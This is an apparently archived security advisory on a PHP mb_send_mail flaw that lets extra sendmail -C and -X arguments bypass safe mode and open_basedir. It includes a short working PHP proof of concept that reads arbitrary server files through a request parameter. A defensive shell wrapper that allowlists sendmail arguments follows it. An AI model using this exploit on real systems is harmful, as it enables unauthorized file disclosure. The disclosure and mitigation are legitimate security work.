(PHP) mb_send_mail security bypass

2006.03.01
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Vulnerable: PHP4, PHP5 with use of sendmail 8.13.4

When safemode is disabled and the open_basedir restriction is in effect, we can pass extra parameters to the sendmail command in the mail function, especially the -C and -X arguments:

-C for an alternate configuration file
-X to log everything to a file

This can be used to view files: pass the file to view to the -C argument, and its content is stored in the file passed to the -X argument.

When safemode is enabled and the open_basedir restriction is in effect, we can pass extra parameters to the sendmail command in the mb_send_mail function.

Solution: Use another sendmail command, and don't allow extra parameters for mb_send_mail when safemode is enabled.

<?php
if (isset($_REQUEST['file'])) {
    $file = "sendlog";
    // Remove any log left over from a previous run
    if (file_exists($file)) unlink($file);
    // -C: file read as the sendmail configuration; -X: log file in the current directory
    $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
    mb_send_mail(NULL, NULL, NULL, NULL, $extra);
    // The -X log now contains what sendmail recorded while reading the -C file
    echo "<pre>".file_get_contents($file)."</pre>";
}
?>
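One way to apply the "use other sendmail command" part of the solution is to point PHP's sendmail_path at a wrapper that only lets an allowlisted set of arguments reach the real binary. The script below is an added example, not part of the original advisory; the install name sendmail-wrapper, the path /usr/sbin/sendmail and the chosen allowlist (-t, -i, -oi, -f) are assumptions.

```shell
#!/bin/sh
# Added example: allowlisting wrapper for PHP's sendmail_path (php.ini).
# Assumed: installed as "sendmail-wrapper"; real binary at /usr/sbin/sendmail.
REAL_SENDMAIL="${REAL_SENDMAIL:-/usr/sbin/sendmail}"

# is_address: accept only a conservative character set, never a leading "-".
is_address() {
    case "$1" in
        ""|-*|*[!A-Za-z0-9@._+-]*) return 1 ;;
    esac
    return 0
}

# args_allowed: succeed only if every argument is on the allowlist.
# An allowlist (rather than a -C/-X denylist) also rejects bundled
# forms such as -tiCfile.
args_allowed() {
    while [ "$#" -gt 0 ]; do
        case "$1" in
            -t|-i|-oi) ;;                       # default sendmail_path options
            -f)                                 # "-f addr" (two arguments)
                shift
                [ "$#" -gt 0 ] || return 1
                is_address "$1" || return 1 ;;
            -f?*)                               # "-faddr" (one argument)
                is_address "${1#-f}" || return 1 ;;
            *) return 1 ;;                      # -C, -X and everything else
        esac
        shift
    done
    return 0
}

# Act as the wrapper only when invoked under the assumed install name.
if [ "${0##*/}" = "sendmail-wrapper" ]; then
    if args_allowed "$@"; then
        exec "$REAL_SENDMAIL" "$@"
    fi
    logger -t sendmail-wrapper "rejected arguments: $*"
    exit 64   # EX_USAGE
fi
```

Rejected calls are logged through syslog, so an attempt to pass -C or -X from a hosted script shows up as a sendmail-wrapper entry.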



Copyright 2020, cxsecurity.com